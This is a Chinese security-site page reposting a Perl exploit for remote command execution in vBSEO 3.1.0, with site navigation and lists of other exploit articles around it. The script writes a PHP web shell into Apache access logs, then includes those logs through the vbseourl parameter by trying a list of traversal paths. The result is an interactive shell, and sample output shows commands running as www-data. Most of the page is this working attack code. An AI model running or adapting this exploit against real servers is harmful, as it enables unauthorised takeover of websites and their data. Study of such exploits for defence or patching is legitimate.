首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
vBseo(百度推广)远程执行漏洞
来源:http://www.hack0wn.com 作者:JossGongora 发布时间:2011-06-30  

 !/usr/bin/perl

####################################################################
# vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit
# vendor: http://www.vbseo.com/
#
# Author: Jose Luis Gongora Fernandez (a.k.a) JosS
# twitter: @JossGongora
# mail: joss.xroot(0x40)gmail(0x2e)com
# site: http://www.hack0wn.com/
#
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# thanks: CWH Underground
#
####################################################################
# OUTPUT:
#
# Trying to Inject the Code...
# Successfully injected in ../../../../../../../var/log/apache2/access.log
#
# [shell]:~$ id
#  uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
#  Linux mediapc 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# joss@h4x0rz:~/Desktop$
 
 
    use LWP::UserAgent;
    use IO::Socket;
    use LWP::Simple;
 
    
    @apache=(
        "../../../../../../../apache/logs/error.log",
    "../../../../../../../apache/logs/access.log",
    "../../../../../../../apache/logs/error.log",
    "../../../../../../../apache/logs/access.log",
    "../../../../../../../apache/logs/error.log",
    "../../../../../../../apache/logs/access.log",
    "../../../../../../../etc/httpd/logs/acces_log",
    "../../../../../../../etc/httpd/logs/acces.log",
    "../../../../../../../etc/httpd/logs/error_log",
    "../../../../../../../etc/httpd/logs/error.log",
    "../../../../../../../var/www/logs/access_log",
    "../../../../../../../var/www/logs/access.log",
    "../../../../../../../usr/local/apache/logs/access_log",
    "../../../../../../../usr/local/apache/logs/access.log",
    "../../../../../../../var/log/apache/access_log",
    "../../../../../../../var/log/apache2/access_log",
    "../../../../../../../var/log/apache/access.log",
    "../../../../../../../var/log/apache2/access.log",
    "../../../../../../../var/log/access_log",
    "../../../../../../../var/log/access.log",
    "../../../../../../../var/www/logs/error_log",
    "../../../../../../../var/www/logs/error.log",
    "../../../../../../../usr/local/apache/logs/error_log",
    "../../../../../../../usr/local/apache/logs/error.log",
    "../../../../../../../var/log/apache/error_log",
    "../../../../../../../var/log/apache2/error_log",
    "../../../../../../../var/log/apache/error.log",
    "../../../../../../../var/log/apache2/error.log",
    "../../../../../../../var/log/error_log",
    "../../../../../../../var/log/error.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/access_log"
    );
 
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
        print "#######################################################################\n";
        print "#  vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit  #\n";
        print "#######################################################################\n\n";
 
 
        if (!$ARGV[0])
           {
             print "Usage: perl exploit.pl [host]\n";
             print "       perl exploit.pl localhost\n\n";

 

exit;}

 
    $host=$ARGV[0];
    $path="/vbseo.php?vbseoembedd=1&vbseourl="; # change if it is necesary
 
    # if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}
    
    print "\nTrying to Inject the Code...\n";
    $CODE="<? passthru(\$_GET[cmd]) ?>";
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
    print $socket "GET /images/"."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#" . "HTTP/1.1";
    print $socket "Host: ".$host."\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    
     if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}
    
    foreach $getlog(@apache)
                {
                  chomp($getlog);          
          $find= $host.$path.$getlog; # $find= $host.$path.$getlog."%00";
          $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
          $req = HTTP::Request->new(GET => $find);
          $res = $xpl->request($req);
          $info = $res->content;
                  if($info =~ /\#\#\%\$\$\%\#\#/) # change if it is necesary
                  {print "Successfully injected in $getlog \n\n";$log=$getlog; last;}
                }
    
    print "[shell]:~\$ ";
    chomp( $cmd = <STDIN> );
    
    while($cmd !~ "exit") {   
             $shell= $host.$path.$log."&cmd=$cmd"; # $shell= $host.$path.$log."%00&cmd=$cmd";
             $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
             $req = HTTP::Request->new(GET => $shell);
             $res = $xpl->request($req);
             $info = $res->content; 
                 if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) 
                 {print $1;}
             print "[shell]:~\$ ";
             chomp( $cmd = <STDIN> ); 
    }


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·易通企业网站最新0DAY漏洞
·风讯 4.0之前所有版本通杀拿SHEL
·InnovaStudio WYSIWYG Editor 3.
·Discuz! X2 SQL注射漏洞,支持Un
·掏帝管理平台安全漏洞
·某企业站系统SQL注入批量拿shell
·Modoer 1.2.5 注入0day
·网奇CWMS企业网站管理系统3.0编
·dedecms 5.6 RSS订阅页面注入漏
·DeDecms xss 通杀0day 附getshel
·Nuclear-Blog v4.0 留言板的 XSS
·极速安康学校网站程序 v3.1.1 co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved